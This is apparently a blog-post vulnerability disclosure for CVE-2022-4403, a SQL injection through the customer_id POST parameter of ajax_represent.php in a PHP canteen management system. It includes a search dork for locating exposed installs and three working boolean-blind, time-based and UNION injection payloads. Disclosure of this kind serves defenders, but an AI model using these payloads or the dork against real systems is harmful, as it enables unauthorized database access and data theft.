Headline
CVE-2022-4403: Canteen Management System ajax_represent.php sql injection_huangsirer的博客-CSDN博客
A vulnerability classified as critical was found in SourceCodester Canteen Management System. This vulnerability affects unknown code of the file ajax_represent.php. The manipulation of the argument customer_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-215272.
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
Canteen Management System ajax_represent.php sql injection
inurl: youthappam/php_action/ajax_represent.php
Abstract:
Line 27 of ajax_represent.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.
Explanation:
SQL injection errors occur when:
- Data enters a program from an untrusted source.
- The data is used to dynamically construct a SQL query.
In this case, the data is passed to query() in ajax_represent.php at line 27.
current-db
payload:
Parameter: customer_id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: customer_id=1' AND 4961=4961 AND 'mqPP'='mqPP
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: customer_id=1' AND (SELECT 6401 FROM (SELECT(SLEEP(5)))eypH) AND 'vuyE'='vuyE
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: customer_id=-9319' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a6b7671,0x6c415159714766417374776d5443614642596d75705455494944776c49436974744d56574146766d,0x7171717871),NULL,NULL,NULL,NULL-- -
Download Code:
https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html